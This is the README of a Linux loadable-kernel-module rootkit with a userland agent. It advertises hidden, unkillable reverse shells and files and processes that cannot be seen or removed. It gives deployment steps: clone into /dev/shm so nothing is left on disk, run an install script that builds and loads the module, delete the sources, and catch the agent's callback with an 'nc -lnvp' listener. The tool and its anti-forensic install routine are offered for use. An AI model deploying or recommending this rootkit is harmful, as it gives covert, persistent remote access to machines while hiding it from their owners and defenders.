a linux loadable kernel module (LKM) rootkit for modern kernels using a userland agent, it provides a reverse backdoor that you can use to create hidden reverse shells, hidding files and protecting processes.

• support for 5.15+ 64 bit kernels
• create hidden and unkillable reverse shells
• make files hidden, unremovable and unreadable
• make processes hidden and unkillable

first you should install all the dependencies:

• build-essential: gcc and other compile tools
• linux-headers: linux API headers needed for building a LKM

then clone the repository, to leave no trace on the disk you can do this inside the /dev/shm directory:

cd /dev/shm
git clone https://github.com/ngn13/wkit.git
cd wkit

after that run the install.sh script:

./install.sh

this script will:

• check the kernel version and arch
• create new random configuration
• build the kernel module
• build the userland agent
• install the userland agent
• load the kernel module

lastly cleanup the sources:

cd .. && rm -rf wkit

start a netcat listener on the host and port you specified during the installation:

nc -lnvp <port>

userland agent attempts to make connection with this address every 5 seconds, so you should receive a backdoor connection in few seconds

to learn more about LKMs and rootkits checkout these resources:

• LKM programming guide
• xcellerator's kernel hacking guide
• Linux kernel teaching

also feel free to create issues if you have any questions - you can also contribute with PRs